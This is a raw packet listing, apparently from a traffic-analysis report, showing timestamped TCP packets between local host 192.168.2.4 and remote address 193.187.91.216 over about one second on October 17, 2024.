                                                                                                                                                    Oct 17, 2024 14:19:11.007870913 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.062076092 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.062128067 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.062144995 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.062156916 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.062197924 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.062275887 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.062392950 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.062450886 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.123667955 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.123831034 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.123874903 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.124191046 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124273062 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124288082 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124310970 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.124526024 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124541044 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124567986 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.124773979 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124787092 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124800920 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124814987 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124815941 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.124829054 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.124839067 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.124871969 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.125252008 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.125371933 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.125420094 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.125518084 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.171974897 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.180759907 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.180922985 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.180938959 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.180955887 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.180963039 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.181001902 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.181041956 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.234322071 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.241560936 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.241580963 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.241604090 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.241627932 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.241816044 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.241831064 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.241857052 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.242063046 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.242100954 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.242182016 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.242203951 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.242237091 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.242472887 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.242486954 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.242525101 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.242695093 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.242710114 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.242746115 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.242904902 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.283816099 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.283833027 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.283843994 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.283890009 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.283921003 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.297950983 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.297971010 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.298047066 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.298054934 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.298125982 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.298171043 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.351522923 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.351732016 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.351878881 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.358834982 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.358850002 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.358864069 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.358912945 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.359047890 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359102011 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.359138012 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359441996 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359451056 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359461069 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359472036 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359498978 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.359607935 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359644890 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.359814882 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359826088 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.359863997 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.359936953 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.360101938 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.360111952 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.360156059 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.400913000 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.400973082 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.400988102 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.401048899 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.415821075 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.415839911 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.415853024 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.415958881 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.476433039 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476454020 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476468086 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476480961 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476548910 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476571083 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.476623058 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476670027 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476722956 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.476830006 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476844072 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.476882935 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.477050066 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.477102041 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.477112055 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.477124929 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.477165937 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.477432966 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.477494955 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.477538109 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.477581978 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.477654934 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.477696896 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.477722883 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.518296003 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.518379927 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.518393040 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.518450975 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.532782078 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.533129930 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.533143997 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.533185959 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.533201933 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.533231020 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.593696117 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.593801022 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.593812943 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.593898058 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.594055891 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594101906 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.594121933 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594279051 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594290018 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594305038 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594320059 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594439983 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.594439983 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.594573975 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594620943 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.594743013 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594755888 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594806910 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.594965935 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594980001 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.594993114 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.595005989 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.595026016 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.595046997 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.595437050 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.635776997 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.635854959 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.635867119 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.635942936 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.650317907 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.650407076 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.650424004 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.650466919 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.650635958 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.650698900 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.711548090 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.711618900 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.711631060 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.711663961 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.711858034 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.711869955 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.711879969 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.711891890 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.711910009 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.711977005 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.712243080 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.712285995 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.712374926 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.712389946 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.712446928 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.712606907 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.712619066 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.712631941 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.712646008 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.712662935 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.712687969 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.713006973 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.754280090 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.754400969 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.754417896 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.754453897 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.754487991 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.767601967 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.767653942 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.767668962 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.767705917 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.767951012 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.767967939 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.767996073 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.812447071 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.828588009 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.828644991 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.828660011 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.828710079 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.828841925 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.828885078 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.828902006 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829004049 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829046011 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829087973 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.829185963 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829201937 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829220057 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829227924 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.829266071 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.829469919 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829663992 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829722881 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829736948 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.829737902 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.829777002 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.829961061 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.830017090 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.830030918 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.830054045 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.871778011 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.871797085 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.871810913 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.871831894 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.871867895 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.884707928 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.884772062 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.884816885 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.884866953 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.885018110 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.885025024 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.885031939 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.885068893 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.885114908 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.885400057 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.937434912 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.946067095 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946126938 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946161032 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946175098 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.946280956 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946335077 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.946408987 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946443081 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946494102 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.946573973 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946588039 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946636915 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.946765900 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946899891 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946914911 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.946943045 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.947112083 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.947180986 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.947217941 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.947370052 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.947396040 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.947413921 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.947438002 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.947480917 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.947770119 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.988903046 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.988995075 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.989025116 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.989057064 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.989078045 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.989103079 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:12.002295017 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:12.002420902 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:12.002437115 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:12.002471924 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:12.002497911 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:12.002667904 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:12.002682924 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:12.002701998 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:12.002727985 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:12.003017902 CEST5384862817193.187.91.216192.168.2.4
